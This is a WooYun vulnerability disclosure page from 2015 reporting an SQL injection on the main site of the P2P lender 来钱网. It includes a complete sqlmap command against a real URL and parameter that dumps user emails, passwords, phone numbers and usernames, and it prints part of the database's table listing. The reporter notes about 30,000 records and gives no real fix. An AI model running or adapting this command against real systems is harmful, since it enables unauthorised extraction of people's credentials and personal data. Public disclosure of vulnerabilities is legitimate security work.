当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138264

漏洞标题: P2P金融安全之来钱网主站SQL注射(信息泄露)

相关厂商:来钱网

漏洞作者: 路人甲

提交时间:2015-09-01 09:15

修复时间:2015-10-16 09:16

公开时间:2015-10-16 09:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-01: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

睡觉前的一个意外

详细说明:

Sqlmap -u "http://www.laiqian.com/index.php?r=ZipoGegu/IpoGegu&ipo_id=147&code=HLI&navIndex1=1" -p ipo_id -D js_fund -T users -C email,password,phone,username --dump

漏洞证明:

2.jpg


atabase: js_fund
[101 tables]
+-----------------------------------------------+
| access_count |
| all_us_stock_info |
| area |
| category |
| club_cellphone_count |
| club_express |
| club_regist |
| country |
| email_config |
| feedback |
| financial_type_choose |
| financing_advisor |
| financing_appointment |
| financing_issue |
| financing_news |
| financing_product |
| financing_product_comment |
| financing_product_detail |
| financing_product_type |
| financing_rate_trend |
| financing_support |
| friends_group |
| identification |
| ipo_company |
| ipo_company_status |
| ipo_issuers |
| ipo_product |
| ipo_quiz |
| job |
| lq_temp |
| manager |
| medal |
| news |
| operation_log |
| permission |
| post_comment |
| product_comment |
| product_quiz |
| product_reply |
| product_saler |
| product_support |
| question_answer |
| role |
| role_permission |
| slide |
| sp500_us_stock_info |
| stock


3万数据也不少呀!- -

修复方案:

时间不早了,睡觉了

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝